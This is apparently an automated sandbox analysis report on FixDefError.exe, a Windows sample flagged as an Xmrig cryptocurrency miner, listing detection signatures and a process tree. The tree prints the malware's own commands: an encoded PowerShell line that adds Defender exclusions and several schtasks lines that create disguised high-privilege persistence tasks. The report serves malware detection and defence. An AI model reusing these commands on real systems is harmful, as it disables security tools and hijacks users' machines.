Windows
Analysis Report
FixDefError.exe
Overview
General Information
Detection
Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Modifies power options to not sleep / hibernate
Found strings related to Crypto-Mining
Modifies the hosts file
Encrypted powershell cmdline option found
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Creates driver files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- FixDefError.exe (PID: 5872, cmdline: C:\Users\user\Desktop\FixDefError.exe, MD5: 1B664F2A0BEDE6C47E44CA8C0AAD3DE7)
  - ProgramStarter.exe (PID: 5928, cmdline: "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe", MD5: 0326F45523014399DEA91452C957B5E0)
    - cmd.exe (PID: 6128, cmdline: cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      - conhost.exe (PID: 6136, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      - powershell.exe (PID: 5228, cmdline: powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A", MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    - cmd.exe (PID: 3196, cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      - conhost.exe (PID: 1672, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      - schtasks.exe (PID: 4900, cmdline: SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: 15FF7D8324231381BAD48A052F85DF04)
    - cmd.exe (PID: 4092, cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      - conhost.exe (PID: 2436, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      - schtasks.exe (PID: 2220, cmdline: SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: 15FF7D8324231381BAD48A052F85DF04)
    - cmd.exe (PID: 4844, cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      - conhost.exe (PID: 5320, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      - schtasks.exe (PID: 5268, cmdline: SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: 15FF7D8324231381BAD48A052F85DF04)
    - cmd.exe (PID: 4560, cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      - conhost.exe (PID: 3012, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      - schtasks.exe (PID: 5296, cmdline: SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: 15FF7D8324231381BAD48A052F85DF04)
    - cmd.exe (PID: 1964, cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      - conhost.exe (PID: 5408, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      - schtasks.exe (PID: 2956, cmdline: SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: 15FF7D8324231381BAD48A052F85DF04)
    - cmd.exe (PID: 5272, cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      - conhost.exe (PID: 3228, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)